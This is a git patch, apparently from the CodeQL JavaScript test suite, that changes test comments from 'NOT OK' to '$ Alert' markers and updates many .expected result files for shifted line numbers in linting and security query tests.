require('vue'); new Vue( { - created: () => this, // NOT OK + created: () => this, // $ Alert computed: { - x: () => this, // NOT OK - y: { get: () => this }, // NOT OK - z: { set: () => this } // NOT OK + x: () => this, // $ Alert + y: { get: () => this }, // $ Alert + z: { set: () => this } // $ Alert }, methods: { - arrow: () => this, // NOT OK - nonArrow: function() { this; }, // OK - arrowWithoutThis: () => 42, // OK - arrowWithNestedThis: () => (() => this) // OK + arrow: () => this, // $ Alert + nonArrow: function() { this; }, + arrowWithoutThis: () => 42, + arrowWithNestedThis: () => (() => this) } }); diff --git a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js index e6c6509eca6e..652853b992e9 100644 --- a/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js +++ b/javascript/ql/test/query-tests/external/DuplicateFunction/d/tst.js @@ -31,7 +31,7 @@ var g2 = function() { return arguments[0] * arguments[1]; } -// OK: only five statements +// OK - only five statements function h() { if (arguments.length == 0) return 23; From 426edd55f2dd3a5fbec9eeb09ea17fe869de12ce Mon Sep 17 00:00:00 2001 From: Asger F Date: Thu, 6 Feb 2025 14:33:21 +0100 Subject: [PATCH 004/115] JS: Update output after line number change Some OK-style comments had to be moved to the following line, shifting line numbers. In selected range also included the comments themselves. Lastly, the result sets were reordered by the CLI in some cases. --- .../RepeatedInjection.expected | 4 +- .../UnusedAngularDependency.expected | 2 +- .../AngularJS/UseNgSrc/UseNgSrc.expected | 10 +- .../DOM/HTML/AmbiguousIdAttribute.expected | 2 +- .../DOM/HTML/ConflictingAttributes.expected | 4 +- .../DOM/HTML/DuplicateAttributes.expected | 4 +- .../DOM/HTML/MalformedIdAttribute.expected | 4 +- .../DOM/TargetBlank/TargetBlank.expected | 10 +- .../AssignmentToConst.expected | 14 +- .../ClobberingVarInit.expected | 2 +- .../DeadStoreOfGlobal.expected | 2 +- .../DeadStoreOfLocal.expected | 24 +- .../DuplicateVarDecl.expected | 2 +- .../MissingThisQualifier.expected | 12 +- .../MissingVarDecl/MissingVarDecl.expected | 14 +- .../MixedStaticInstanceThisAccess.expected | 6 +- .../TemporalDeadZone.expected | 2 +- .../UnusedParameter/UnusedParameter.expected | 6 +- .../UnusedVariable/UnusedVariable.expected | 2 +- .../EnablingNodeIntegration.expected | 2 +- .../BitwiseSignCheck.expected | 4 +- .../CompareIdenticalValues.expected | 2 +- .../ExprHasNoEffect/ExprHasNoEffect.expected | 16 +- .../HeterogeneousComparison.expected | 100 +- .../ImplicitOperandConversion.expected | 34 +- .../MisspelledIdentifier.expected | 12 +- .../SelfAssignment/SelfAssignment.expected | 6 +- .../SuspiciousInvocation.expected | 2 +- .../WhitespaceContradictsPrecedence.expected | 2 +- .../UndocumentedParameter.expected | 4 +- .../BadTypeof/BadTypeof.expected | 6 +- .../ExpressionClosures.expected | 2 +- .../LengthComparisonOffByOne.expected | 14 +- .../NonLinearPattern.expected | 22 +- .../PropertyWriteOnPrimitive.expected | 6 +- .../SetterIgnoresParameter.expected | 4 +- .../SetterReturn/SetterReturn.expected | 2 +- .../SpuriousArguments.expected | 28 +- .../StrictModeCallStackIntrospection.expected | 14 +- .../YieldInNonGenerator.expected | 2 +- .../NonLocalForIn/NonLocalForIn.expected | 10 +- .../ReassignParameterAndUseArguments.expected | 2 +- .../BackrefIntoNegativeLookahead.expected | 2 +- .../UnboundBackref/UnboundBackref.expected | 8 +- .../UnmatchableCaret.expected | 6 +- .../UnmatchableDollar.expected | 8 +- .../CWE-022/TaintedPath/TaintedPath.expected | 744 +++++------ .../UselessUseOfCat/UselessUseOfCat.expected | 2 +- .../Security/CWE-079/DomBasedXss/Xss.expected | 1122 ++++++++--------- .../XssWithAdditionalSources.expected | 934 +++++++------- .../ReflectedXss/ReflectedXss.expected | 232 ++-- .../ReflectedXssWithCustomSanitizer.expected | 44 +- .../UnsafeJQueryPlugin.expected | 22 +- .../CWE-089/untyped/DatabaseAccesses.expected | 82 +- .../CWE-089/untyped/SqlInjection.expected | 788 ++++++------ .../CodeInjection/CodeInjection.expected | 154 +-- .../HeuristicSourceCodeInjection.expected | 112 +- .../CWE-1004/ClientExposedCookie.expected | 16 +- ...ompleteMultiCharacterSanitization.expected | 42 +- .../CWE-1275/SameSiteNoneCookie.expected | 8 +- .../CWE-200/FileAccessToHttp.expected | 18 +- .../CWE-312/BuildArtifactLeak.expected | 6 +- .../CWE-312/CleartextStorage.expected | 6 +- .../Security/CWE-367/FileSystemRace.expected | 2 +- .../ReDoS/PolynomialBackTracking.expected | 42 +- .../CWE-400/ReDoS/PolynomialReDoS.expected | 6 +- .../Security/CWE-400/ReDoS/ReDoS.expected | 34 +- .../ClientSideUrlRedirect.expected | 186 +-- .../ServerSideUrlRedirect.expected | 198 +-- .../query-tests/Security/CWE-611/Xxe.expected | 38 +- .../Security/CWE-614/ClearTextCookie.expected | 26 +- .../Security/CWE-643/XpathInjection.expected | 10 +- .../Security/CWE-730/RegExpInjection.expected | 222 ++-- .../Security/CWE-730/ServerCrash.expected | 66 +- .../Security/CWE-776/XmlBomb.expected | 38 +- .../CWE-807/ConditionalBypass.expected | 2 +- .../FunctionalityFromUntrustedSource.expected | 10 +- ...onfusionThroughParameterTampering.expected | 8 +- .../PrototypePollutingMergeCall.expected | 12 +- .../EphemeralLoop/EphemeralLoop.expected | 4 +- .../ImplicitReturn/ImplicitReturn.expected | 6 +- .../InconsistentLoopOrientation.expected | 6 +- .../NestedLoopsSameVariable.expected | 2 +- .../ReturnAssignsLocal.expected | 4 +- .../ReturnOutsideFunction.expected | 2 +- ...iciousUnusedLoopIterationVariable.expected | 8 +- 86 files changed, 2855 insertions(+), 2855 deletions(-) diff --git a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected index 227dcedf486c..ceb747011ba8 100644 --- a/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected +++ b/javascript/ql/test/query-tests/AngularJS/RepeatedInjection/RepeatedInjection.expected @@ -2,5 +2,5 @@ | repeated-injection.js:6:5:6:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:8:54:8:73 | ['name', $Injected2] | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:11:5:11:22 | $Injected3.$inject | dependency injections | | repeated-injection.js:10:5:10:31 | functio ... name){} | This function has $@ defined in multiple places. | repeated-injection.js:12:5:12:22 | $Injected3.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | -| repeated-injection.js:33:5:33:84 | functio ... )\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:35:5:35:23 | $Injected10.$inject | dependency injections | +| repeated-injection.js:33:5:33:85 | functio ... n\\n } | This function has $@ defined in multiple places. | repeated-injection.js:36:56:36:76 | ['name' ... cted10] | dependency injections | diff --git a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected index d5b4c267c39e..2ca924302a23 100644 --- a/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected +++ b/javascript/ql/test/query-tests/AngularJS/UnusedAngularDependency/UnusedAngularDependency.expected @@ -2,4 +2,4 @@ | unused-angular-dependency.js:14:14:14:39 | ["unuse ... n() {}] | This function has 0 parameters, but 1 dependency is injected into it. | | unused-angular-dependency.js:16:14:16:53 | ["used2 ... d2) {}] | This function has 1 parameter, but 2 dependencies are injected into it. | | unused-angular-dependency.js:17:14:17:52 | ["unuse ... n() {}] | This function has 0 parameters, but 2 dependencies are injected into it. | -| unused-angular-dependency.js:18:14:18:105 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | +| unused-angular-dependency.js:18:14:18:106 | ["used2 ... }] | This function has 1 parameter, but 2 dependencies are injected into it. | diff --git a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected index 5b5f5ffa00c0..bd93c005dec1 100644 --- a/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected +++ b/javascript/ql/test/query-tests/AngularJS/UseNgSrc/UseNgSrc.expected @@ -1,5 +1,5 @@ -| tst2.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:8:6:8:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | -| tst.html:10:40:10:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | -| tst.html:11:10:11:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | -| tst_fragment.html:3:6:3:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst2.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:7:6:7:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | +| tst.html:9:40:9:83 | srcset=#/resources/pics-large/{{item._id}} | Use 'ng-srcset' instead of 'srcset'. | +| tst.html:10:10:10:52 | src=#/resources/pics-default/{{item._id}} | Use 'ng-src' instead of 'src'. | +| tst_fragment.html:2:6:2:24 | href={{help_url}} | Use 'ng-href' instead of 'href'. | diff --git a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected index c013ea098297..3f5ebd72f8ec 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/AmbiguousIdAttribute.expected @@ -1,3 +1,3 @@ | AmbiguousIdAttribute.html:4:5:4:14 | id=first | This element has the same id as $@. | AmbiguousIdAttribute.html:5:5:5:14 | id=first | another element | | AmbiguousIdAttribute_fragment.html:2:7:2:16 | id=first | This element has the same id as $@. | AmbiguousIdAttribute_fragment.html:3:7:3:16 | id=first | another element | -| tst.js:22:22:22:33 | id="theDiff" | This element has the same id as $@. | tst.js:22:46:22:57 | id="theDiff" | another element | +| tst.js:17:22:17:33 | id="theDiff" | This element has the same id as $@. | tst.js:17:46:17:57 | id="theDiff" | another element | diff --git a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected index 46ff575e355c..4b9243036e4f 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/ConflictingAttributes.expected @@ -1,3 +1,3 @@ | ConflictingAttributes.html:1:4:1:27 | href=http://semmle.com | This attribute has the same name as $@ of the same element, but a different value. | ConflictingAttributes.html:1:29:1:53 | href=https://semmle.com | another attribute | -| tst.js:6:4:6:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:6:29:6:53 | href="h ... le.com" | another attribute | -| tst.js:16:4:16:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:16:29:16:46 | href={someValue()} | another attribute | +| tst.js:5:4:5:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:5:29:5:53 | href="h ... le.com" | another attribute | +| tst.js:12:4:12:27 | href="h ... le.com" | This attribute has the same name as $@ of the same element, but a different value. | tst.js:12:29:12:46 | href={someValue()} | another attribute | diff --git a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected index 988c4925a461..aa0a43e5d1be 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/DuplicateAttributes.expected @@ -1,3 +1,3 @@ | DuplicateAttributes.html:1:4:1:28 | href=https://semmle.com | This attribute $@. | DuplicateAttributes.html:1:30:1:54 | href=https://semmle.com | is duplicated later | -| tst.js:9:4:9:28 | href="h ... le.com" | This attribute $@. | tst.js:9:30:9:54 | href="h ... le.com" | is duplicated later | -| tst.js:25:17:25:28 | id="theDiff" | This attribute $@. | tst.js:25:30:25:41 | id="theDiff" | is duplicated later | +| tst.js:7:4:7:28 | href="h ... le.com" | This attribute $@. | tst.js:7:30:7:54 | href="h ... le.com" | is duplicated later | +| tst.js:19:17:19:28 | id="theDiff" | This attribute $@. | tst.js:19:30:19:41 | id="theDiff" | is duplicated later | diff --git a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected index 96d365e5dc5e..fbbfcc95d23b 100644 --- a/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected +++ b/javascript/ql/test/query-tests/DOM/HTML/MalformedIdAttribute.expected @@ -1,5 +1,5 @@ | AmbiguousIdAttributeGood.html:8:5:8:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | AmbiguousIdAttributeGood.html:9:5:9:19 | id=invalid id | The value of the id attribute must not contain any space characters. | | MalformedIdAttribute.html:1:6:1:27 | id=heading important | The value of the id attribute must not contain any space characters. | -| tst.js:12:6:12:10 | id="" | The value of the id attribute must contain at least one character. | -| tst.js:13:6:13:13 | id="a b" | The value of the id attribute must not contain any space characters. | +| tst.js:9:6:9:10 | id="" | The value of the id attribute must contain at least one character. | +| tst.js:10:6:10:13 | id="a b" | The value of the id attribute must not contain any space characters. | diff --git a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected index 1fba6292f897..531f431b86f9 100644 --- a/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected +++ b/javascript/ql/test/query-tests/DOM/TargetBlank/TargetBlank.expected @@ -2,8 +2,8 @@ | tst.html:24:1:24:48 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:25:1:25:36 | ... | External links without noopener/noreferrer are a potential security risk. | | tst.html:30:1:30:61 | ... | External links without noopener/noreferrer are a potential security risk. | -| tst.js:18:1:18:43 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:19:1:19:58 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:20:1:20:51 | | External links without noopener/noreferrer are a potential security risk. | -| tst.js:33:12:33:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | -| tst.js:42:12:42:20 | $("") | External links without noopener/noreferrer are a potential security risk. | +| tst.js:17:1:17:43 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:18:1:18:58 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:19:1:19:51 | | External links without noopener/noreferrer are a potential security risk. | +| tst.js:31:12:31:39 | $(" ... X}}" }) | External links without noopener/noreferrer are a potential security risk. | +| tst.js:39:12:39:20 | $("") | External links without noopener/noreferrer are a potential security risk. | diff --git a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected index b74841153cb3..7e457d64b08e 100644 --- a/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected +++ b/javascript/ql/test/query-tests/Declarations/AssignmentToConst/AssignmentToConst.expected @@ -1,7 +1,7 @@ -| classes.js:4:1:4:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | -| functions.js:4:10:4:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | -| tst.js:4:1:4:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:7:1:7:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:10:5:10:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:13:1:13:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | -| tst.js:25:10:25:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:24:5:24:19 | const c = null; | declared | +| classes.js:3:1:3:10 | class C {} | Assignment to variable C, which is $@ constant. | classes.js:1:1:1:13 | const C = 45; | declared | +| functions.js:3:10:3:10 | C | Assignment to variable C, which is $@ constant. | functions.js:1:1:1:13 | const C = 45; | declared | +| tst.js:3:1:3:6 | x = 42 | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:5:1:5:6 | y = 23 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:7:5:7:10 | y = -1 | Assignment to variable y, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:9:1:9:3 | ++x | Assignment to variable x, which is $@ constant. | tst.js:1:1:1:21 | const x ... y = 42; | declared | +| tst.js:21:10:21:14 | [ c ] | Assignment to variable c, which is $@ constant. | tst.js:20:5:20:19 | const c = null; | declared | diff --git a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected index 7063b316a62e..501e442bcbf2 100644 --- a/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected +++ b/javascript/ql/test/query-tests/Declarations/ClobberingVarInit/ClobberingVarInit.expected @@ -1 +1 @@ -| tst.js:3:24:3:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:3:9:3:21 | key = iter[0] | earlier initialization | +| tst.js:2:24:2:36 | key = iter[1] | This initialization of key overwrites an $@. | tst.js:2:9:2:21 | key = iter[0] | earlier initialization | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected index 3c4777ca5a6f..d4f34fa75983 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfGlobal/DeadStoreOfGlobal.expected @@ -1,2 +1,2 @@ -| tst.js:2:1:2:1 | g | This definition of g is useless, since its value is never read. | +| tst.js:1:1:1:1 | g | This definition of g is useless, since its value is never read. | | worker.js:3:1:3:9 | onmissage | This definition of onmissage is useless, since its value is never read. | diff --git a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected index 88b5fc55b25c..8d5b7af35dab 100644 --- a/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected +++ b/javascript/ql/test/query-tests/Declarations/DeadStoreOfLocal/DeadStoreOfLocal.expected @@ -1,13 +1,13 @@ | overload.ts:10:12:10:14 | baz | The value assigned to baz here is unused. | -| tst2.js:26:9:26:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst2.js:28:9:28:14 | x = 42 | The value assigned to x here is unused. | -| tst3.js:2:1:2:36 | exports ... a: 23 } | The value assigned to exports here is unused. | -| tst3b.js:2:18:2:36 | exports = { a: 23 } | The value assigned to exports here is unused. | -| tst.js:6:2:6:7 | y = 23 | The value assigned to y here is unused. | -| tst.js:13:6:13:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | -| tst.js:13:14:13:19 | a = 42 | The value assigned to a here is unused. | -| tst.js:45:6:45:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:51:6:51:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | -| tst.js:132:7:132:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | -| tst.js:162:6:162:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | -| tst.js:172:7:172:17 | nSign = foo | The value assigned to nSign here is unused. | +| tst2.js:25:9:25:14 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst2.js:27:9:27:14 | x = 42 | The value assigned to x here is unused. | +| tst3.js:1:1:1:36 | exports ... a: 23 } | The value assigned to exports here is unused. | +| tst3b.js:1:18:1:36 | exports = { a: 23 } | The value assigned to exports here is unused. | +| tst.js:5:2:5:7 | y = 23 | The value assigned to y here is unused. | +| tst.js:11:6:11:11 | a = 23 | The initial value of a is unused, since it is always overwritten. | +| tst.js:11:14:11:19 | a = 42 | The value assigned to a here is unused. | +| tst.js:43:6:43:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:49:6:49:11 | x = 23 | The initial value of x is unused, since it is always overwritten. | +| tst.js:130:7:130:13 | {x} = o | The initial value of x is unused, since it is always overwritten. | +| tst.js:160:6:160:14 | [x] = [0] | The initial value of x is unused, since it is always overwritten. | +| tst.js:170:7:170:17 | nSign = foo | The value assigned to nSign here is unused. | diff --git a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected index 60d8f7f619e3..26ac43a1dfa2 100644 --- a/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/DuplicateVarDecl/DuplicateVarDecl.expected @@ -1 +1 @@ -| tst.js:2:11:2:16 | a = 42 | Variable a has already $@. | tst.js:2:5:2:5 | a | been previously declared | +| tst.js:1:11:1:16 | a = 42 | Variable a has already $@. | tst.js:1:5:1:5 | a | been previously declared | diff --git a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected index c9bd449006f4..60a075561957 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingThisQualifier/MissingThisQualifier.expected @@ -1,10 +1,10 @@ | abstract-missing.ts:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | abstract-missing.ts:6:3:6:32 | abstrac ... ties(); | setAudioProperties | -| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... K\\n } | m | +| indirection.js:7:9:7:20 | m("default") | This call refers to a global function, and not the local method $@. | indirection.js:2:5:4:5 | m() {\\n ... ;\\n } | m | | missing1.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing1.js:6:3:7:3 | setAudi ... (){\\n } | setAudioProperties | | missing2.js:3:5:3:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | missing2.js:7:3:8:3 | static ... (){\\n } | setAudioProperties | -| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... OK\\n } | globalFunction | -| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... OK\\n } | topNamespaceFunction | -| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... OK\\n } | childNamespaceFunction | -| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... K\\n } | globalFunction | -| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... K\\n } | globalFunction | +| namespaces-uses.ts:3:5:3:20 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:2:3:4:3 | globalF ... ert\\n } | globalFunction | +| namespaces-uses.ts:6:5:6:26 | topName ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:5:3:7:3 | topName ... ert\\n } | topNamespaceFunction | +| namespaces-uses.ts:9:5:9:28 | childNa ... ction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:8:3:10:3 | childNa ... ert\\n } | childNamespaceFunction | +| namespaces-uses.ts:16:7:16:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:15:5:17:5 | globalF ... t\\n } | globalFunction | +| namespaces-uses.ts:30:7:30:22 | globalFunction() | This call refers to a global function, and not the local method $@. | namespaces-uses.ts:29:5:31:5 | globalF ... t\\n } | globalFunction | | not-ignored-by-jslint.js:4:5:4:24 | setAudioProperties() | This call refers to a global function, and not the local method $@. | not-ignored-by-jslint.js:7:3:8:3 | setAudi ... (){\\n } | setAudioProperties | diff --git a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected index f9a35141d67d..a679cb095a7c 100644 --- a/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected +++ b/javascript/ql/test/query-tests/Declarations/MissingVarDecl/MissingVarDecl.expected @@ -1,9 +1,9 @@ -| test.js:6:7:6:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:14:7:14:7 | i | Variable i is used like a local variable, but is missing a declaration. | -| test.js:23:2:23:2 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:54:10:54:10 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:60:6:60:6 | y | Variable y is used like a local variable, but is missing a declaration. | -| test.js:66:2:66:2 | z | Variable z is used like a local variable, but is missing a declaration. | -| test.js:72:9:72:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | +| test.js:5:7:5:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:12:7:12:7 | i | Variable i is used like a local variable, but is missing a declaration. | +| test.js:20:2:20:2 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:50:10:50:10 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:55:6:55:6 | y | Variable y is used like a local variable, but is missing a declaration. | +| test.js:60:2:60:2 | z | Variable z is used like a local variable, but is missing a declaration. | +| test.js:66:9:66:20 | unresolvable | Variable unresolvable is used like a local variable, but is missing a declaration. | | tst3.js:7:10:7:10 | x | Variable x is used like a local variable, but is missing a declaration. | | tst3.js:7:16:7:19 | rest | Variable rest is used like a local variable, but is missing a declaration. | diff --git a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected index 1e5f4d643241..a5b1e0c00dfc 100644 --- a/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected +++ b/javascript/ql/test/query-tests/Declarations/MixedStaticInstanceThisAccess/MixedStaticInstanceThisAccess.expected @@ -1,3 +1,3 @@ -| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... K\\n } | bar | -| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... K\\n } | bar | -| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... K\\n } | test | +| instanceStatic.js:3:9:3:16 | this.baz | Access to instance method $@ from static method $@ is not possible through `this`. | instanceStatic.js:5:5:7:5 | baz(){\\n\\n } | baz | instanceStatic.js:2:5:4:5 | static ... t\\n } | bar | +| staticInstance.js:3:9:3:16 | this.baz | Access to static method $@ from instance method $@ is not possible through `this`. | staticInstance.js:5:5:6:5 | static baz(){\\n } | baz | staticInstance.js:2:5:4:5 | bar(){\\n ... t\\n } | bar | +| tst.js:66:9:66:14 | this.f | Access to instance method $@ from static method $@ is not possible through `this`. | tst.js:60:5:62:5 | f() {\\n\\n } | f | tst.js:65:5:67:5 | static ... t\\n } | test | diff --git a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected index 84d7d3d40fc9..3717fc460cea 100644 --- a/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected +++ b/javascript/ql/test/query-tests/Declarations/TemporalDeadZone/TemporalDeadZone.expected @@ -1 +1 @@ -| tst.js:3:5:3:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:4:5:4:17 | let s = "hi"; | s | +| tst.js:2:5:2:5 | s | This expression refers to $@ inside its temporal dead zone. | tst.js:3:5:3:17 | let s = "hi"; | s | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected index 34cf2d268dc8..f47146ae9b90 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedParameter/UnusedParameter.expected @@ -1,6 +1,6 @@ | istype.ts:18:15:18:18 | node | The parameter 'node' is never used. | | 